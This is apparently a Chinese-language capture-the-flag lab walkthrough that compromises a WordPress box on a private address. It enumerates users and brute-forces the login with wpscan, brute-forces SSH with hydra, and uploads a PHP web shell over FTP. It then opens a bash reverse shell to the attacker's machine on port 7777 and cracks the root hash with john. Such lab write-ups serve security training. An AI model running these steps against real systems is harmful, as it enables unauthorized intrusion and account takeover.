


secret “秘密”网页

将密文保存到 password.txt
此页面使用了 wordpress CMS

疑似用户 ragnar

wpscan 也爆破出了用户 ragnar
wpscan --url http://10.4.7.155/wordpress/ --enumerate u

wpscan --url http://10.4.7.155/wordpress/ --usernames ragnar --passwords password.txt
爆破出密码 ubbe

hydra -l ragnar -P password.txt ssh://10.4.7.155
ragnar 密码为 lagertha

查看 ftp 中有用的信息

未搜集到有用信息
网页登录
10.4.7.155/wordpress/wp-login.php
ragnar
ubbe

卡的登不上去

直接尝试 ftp 上传一句话木马

put shell.php
成功上传

蚁剑连接,发现可以连接

打开蚁剑中虚拟终端,反弹进 kali
bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'

成功反弹
信息搜集
切换到 home 目录,发现有用户 ragnar

尝试使用其 web 和 ftp 密码登录
密码未 ftp 登陆密码 lagertha

查找敏感文件
在 秘密 文件中可以直接看到 root 加密后的密码

john 爆破

切换 root
成功提权

